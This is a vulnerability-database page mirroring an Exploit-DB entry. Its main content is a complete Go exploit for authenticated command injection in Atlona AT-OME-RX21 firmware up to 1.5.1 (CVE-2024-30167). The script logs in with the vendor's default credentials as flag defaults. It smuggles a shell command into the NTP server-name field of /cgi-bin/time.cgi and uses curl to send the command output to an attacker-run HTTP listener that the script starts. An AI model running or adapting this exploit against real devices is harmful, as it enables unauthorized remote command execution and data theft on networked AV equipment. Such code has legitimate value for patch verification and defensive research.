Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Atlona ATOMERX21 - Authenticated Command Injection

🗓️ 29 Apr 2026 00:00:00Reported by rizzziomType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 81 Views

Authenticated command injection in Atlona AT-OME-RX21 firmware (cve described) up to version one point five one.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2024-30167
8 May 202600:00
attackerkb
Circl		CVE-2024-30167
27 Dec 202515:00
circl
CNNVD		Atlona ATOMERX21 命令注入漏洞
29 Apr 202600:00
cnnvd
CVE		CVE-2024-30167
8 May 202600:00
cve
Cvelist		CVE-2024-30167
8 May 202600:00
cvelist
EUVD		EUVD-2024-28103
8 May 202606:32
euvd
NVD		CVE-2024-30167
8 May 202606:16
nvd
Packet Storm		📄 Atlona AT-OME-RX21 Authenticated Command Injection
5 May 202600:00
packetstorm
Positive Technologies		PT-2026-38667
8 May 202600:00
ptsecurity
RedhatCVE		CVE-2024-30167
5 Jun 202618:49
redhatcve
Rows per page
// Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection
// Google Dork: N/A
// Date: 2025-12-28
// Exploit Author: RIZZZIOM
// Vendor Homepage: https://atlona.com
// Software Link: https://atlona.com/product/at-ome-rx21/
// Version: Firmware <= 1.5.1
// Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1)
// CVE : CVE-2024-30167
// Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command>
package main

import (
	"bytes"
	"context"
	"encoding/base64"
	"flag"
	"fmt"
	"io"
	"net/http"
	"os"
	"os/signal"
	"strings"
	"syscall"
	"time"
)

func main() {
	banner := `
		                                                                                  
                                                                                  
▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   
                    
			PoC by: github.com/RIZZZIOM
	`
	fmt.Println(banner)

	target := flag.String("t", "", "Target URL (e.g: http://example.com)")
	username := flag.String("u", "admin", "Username for authentication")
	password := flag.String("p", "Atlona", "Password for authentication")
	lport := flag.String("P", "4444", "listening port for command output")
	lhost := flag.String("l", "", "listening host for command output")
	command := flag.String("c", "", "Command to execute on the target")

	flag.Parse()
	if *target == "" || *lhost == "" || *command == "" {
		fmt.Println("ERROR: Missing required parameters")
		flag.PrintDefaults()
		os.Exit(1)
	}

	url := strings.TrimRight(*target, "/") + "/cgi-bin/time.cgi"
	listener := *lhost + ":" + *lport

	// Buffered channel to prevent goroutine blocking if receiver exits early
	responseChan := make(chan struct{}, 1)

	// Create context for graceful shutdown coordination
	ctx, cancel := context.WithCancel(context.Background())
	defer cancel()

	// Start HTTP server and get reference for shutdown
	server := httpServe(listener, responseChan, ctx)

	executeCommand(url, *username, *password, listener, *command)

	sigChan := make(chan os.Signal, 1)
	signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)

	// Timeout to prevent indefinite waiting
	responseTimeout := time.NewTimer(30 * time.Second)
	defer responseTimeout.Stop()

	select {
	case <-responseChan:
		time.Sleep(1 * time.Second)
	case <-sigChan:
		fmt.Printf("\n===Shutting Down===\n")
	case <-responseTimeout.C:
		fmt.Println("\n===Response Timeout - No response received===")
	}

	// Graceful server shutdown
	cancel() // Signal context cancellation
	shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer shutdownCancel()

	if err := server.Shutdown(shutdownCtx); err != nil {
		fmt.Printf("Server shutdown error: %v\n", err)
	}
}

func executeCommand(url, username, password, listener, command string) {
	// this func sends the commands to the target
	payload := fmt.Sprintf(`{"syncSntpTime":{"serverName":"time.google.com; curl -X POST --data \"$(%s)\" %s"}}`, command, listener)
	auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password))
	req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(payload)))
	if err != nil {
		panic(err)
	}
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0) Firefox/143.0")
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Basic "+auth)
	req.Header.Set("X-Requested-With", "XMLHttpRequest")

	client := &http.Client{
		Timeout: 15 * time.Second,
	}

	resp, err := client.Do(req)
	if err != nil {
		fmt.Printf("ERROR: Request failed: %v\n", err)
		os.Exit(1)
	}
	defer resp.Body.Close()

	switch resp.StatusCode {
	case 200:
		fmt.Println("Command Injection Successful")
	case 401, 403:
		fmt.Printf("ERROR: Authentication Failed (HTTP %d)\n", resp.StatusCode)
	case 404:
		fmt.Printf("ERROR: Target Endpoint Not Found.\n")
	default:
		fmt.Printf("ERROR: Unexpected Response (HTTP %d)\n", resp.StatusCode)
		body, _ := io.ReadAll(resp.Body)
		if len(body) > 0 {
			fmt.Printf("Response Body: %s\n", string(body))
		}
		os.Exit(1)
	}
}

func getResponse(r *http.Request, responseChan chan struct{}) {
	// this function serves and http server and collects response
	if r.Method != http.MethodPost {
		fmt.Printf("Received non-POST Request(%s)\n", r.Method)
		return
	}
	defer r.Body.Close()
	fmt.Println("\n=====Received Response=====")

	body, err := io.ReadAll(r.Body)
	if err != nil {
		fmt.Printf("Failed To Read Response Body: %v\n", err)
		return
	}
	fmt.Println(string(body))

	// Non-blocking send to prevent goroutine deadlock
	select {
	case responseChan <- struct{}{}:
	default:
	}
}

func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server {
	// this function gets the command injection response from the custom header
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		getResponse(r, responseChan)
		w.WriteHeader(http.StatusNoContent)
	})

	server := &http.Server{
		Addr:           listener,
		Handler:        mux,
		MaxHeaderBytes: 20 * 1024 * 1024,
		ReadTimeout:    30 * time.Second,
		WriteTimeout:   30 * time.Second,
		IdleTimeout:    60 * time.Second,
	}

	fmt.Printf("Listening on %s for response...\n", listener)

	go func() {
		if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
			fmt.Printf("ERROR: Server error: %v\n", err)
		}
	}()

	return server
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Apr 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.16.3
EPSS0.01143
SSVC
Atlona deviceauthenticated command injectionfirmware version one point five onetime script exploitrx21 model
81